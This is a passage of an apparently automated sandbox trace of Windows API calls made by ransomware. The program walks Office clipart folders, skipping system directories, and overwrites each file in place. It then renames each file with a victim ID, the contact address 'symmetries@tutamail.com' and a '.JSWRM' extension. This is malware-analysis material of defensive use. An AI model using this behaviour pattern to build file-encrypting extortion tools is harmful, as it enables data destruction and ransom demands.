lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.312] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3768) returned 1 [0075.312] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xeb0) returned 0x24c1d0 [0075.312] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xeb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xeb0, lpOverlapped=0x0) returned 1 [0075.314] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.314] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xeb0, lpOverlapped=0x0) returned 1 [0075.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.314] CloseHandle (hObject=0x460) returned 1 [0075.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0075.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0075.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0075.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0075.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0075.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.314] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0075.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.315] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BOAT.WMF", cAlternateFileName="")) returned 1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2=".") returned 1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="..") returned 1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="...") returned 1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="windows") returned -1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="recovery") returned -1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="perflogs") returned -1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="documents and settings") returned -1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="system volume information") returned -1 [0075.315] lstrcmpiW (lpString1="BOAT.WMF", lpString2="msocache") returned -1 [0075.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0075.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOAT.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0075.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOAT.WMF", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOAT.WMF", lpUsedDefaultChar=0x0) returned 8 [0075.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0075.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0075.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOAT.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0075.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOAT.WMF", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOAT.WMF", lpUsedDefaultChar=0x0) returned 8 [0075.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0075.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.316] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3350) returned 1 [0075.316] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd10) returned 0x24c1d0 [0075.317] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0075.318] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.318] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0075.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.318] CloseHandle (hObject=0x460) returned 1 [0075.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0075.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0075.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0075.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0075.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0075.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0075.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0075.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0075.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.320] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x714c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BOATINST.WMF", cAlternateFileName="")) returned 1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2=".") returned 1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="..") returned 1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="...") returned 1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="windows") returned -1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="recovery") returned -1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="perflogs") returned -1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="documents and settings") returned -1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="system volume information") returned -1 [0075.320] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="msocache") returned -1 [0075.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOATINST.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOATINST.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOATINST.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOATINST.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOATINST.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOATINST.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.321] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29004) returned 1 [0075.321] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7140) returned 0x24c1d0 [0075.321] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x7140, lpOverlapped=0x0) returned 1 [0075.324] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.324] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x7140, lpOverlapped=0x0) returned 1 [0075.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.324] CloseHandle (hObject=0x460) returned 1 [0075.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0075.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0075.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0075.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.325] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.325] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00076_.WMF", cAlternateFileName="")) returned 1 [0075.325] lstrcmpiW (lpString1="BS00076_.WMF", lpString2=".") returned 1 [0075.325] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="..") returned 1 [0075.325] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="...") returned 1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="windows") returned -1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="recovery") returned -1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="perflogs") returned -1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="documents and settings") returned -1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="system volume information") returned -1 [0075.326] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="msocache") returned -1 [0075.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0075.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00076_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00076_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00076_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0075.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0075.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00076_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00076_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00076_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0075.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.326] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1330) returned 1 [0075.326] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x530) returned 0x21af28 [0075.326] ReadFile (in: hFile=0x460, lpBuffer=0x21af28, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesRead=0x345e89c*=0x530, lpOverlapped=0x0) returned 1 [0075.328] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.328] WriteFile (in: hFile=0x460, lpBuffer=0x21af28*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesWritten=0x345e898*=0x530, lpOverlapped=0x0) returned 1 [0075.328] HeapFree (in: hHeap=0x1e0000, 